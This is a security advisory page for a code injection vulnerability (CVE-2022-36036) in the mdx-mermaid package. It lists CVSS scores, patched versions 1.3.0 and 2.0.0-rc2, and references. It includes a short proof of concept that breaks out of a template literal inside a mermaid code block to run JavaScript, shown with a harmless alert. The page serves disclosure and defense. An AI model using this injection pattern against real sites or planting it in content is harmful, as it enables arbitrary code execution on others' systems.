Lucene search

GoogleOSV:GHSA-RVGM-35JW-Q628

HistoryAug 31, 2022 - 10:26 p.m.

Improper Control of Generation of Code ('Code Injection') in mdx-mermaid

2022-08-3122:26:11

Google

osv.dev

code injection

mdx-mermaid

impact

javascript

patches

workarounds

arbitrary

modification

component

loaded

exploit

valid

vulnerable

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

17.8%

JSON

Impact

Arbitary javascript injection

Modify any mermaid code blocks with the following code and the code inside will execute when the component is loaded by MDXjs

` + (function () {
  // Put Javascript code here
  return ''
}()) + `

The block below shows a valid mermaid code block

```mermaid
graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;
```

The same block but with the exploit added

```mermaid
` + (function () {
  alert('vulnerable')
  return ''
}()) + `
graph TD;
    A--&gt;B;
    A--&gt;C;
    B--&gt;D;
    C--&gt;D;
```

Patches

1.3.0 and 2.0.0-rc2

Workarounds

None known

References

github.com/sjwall/mdx-mermaid

github.com/sjwall/mdx-mermaid/commit/f2b99386660fd13316823529c3f1314ebbcdfd2a

github.com/sjwall/mdx-mermaid/security/advisories/GHSA-rvgm-35jw-q628

nvd.nist.gov/vuln/detail/CVE-2022-36036

CVSS3

7.8

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

EPSS

0.001

Percentile

17.8%

JSON

Related for OSV:GHSA-RVGM-35JW-Q628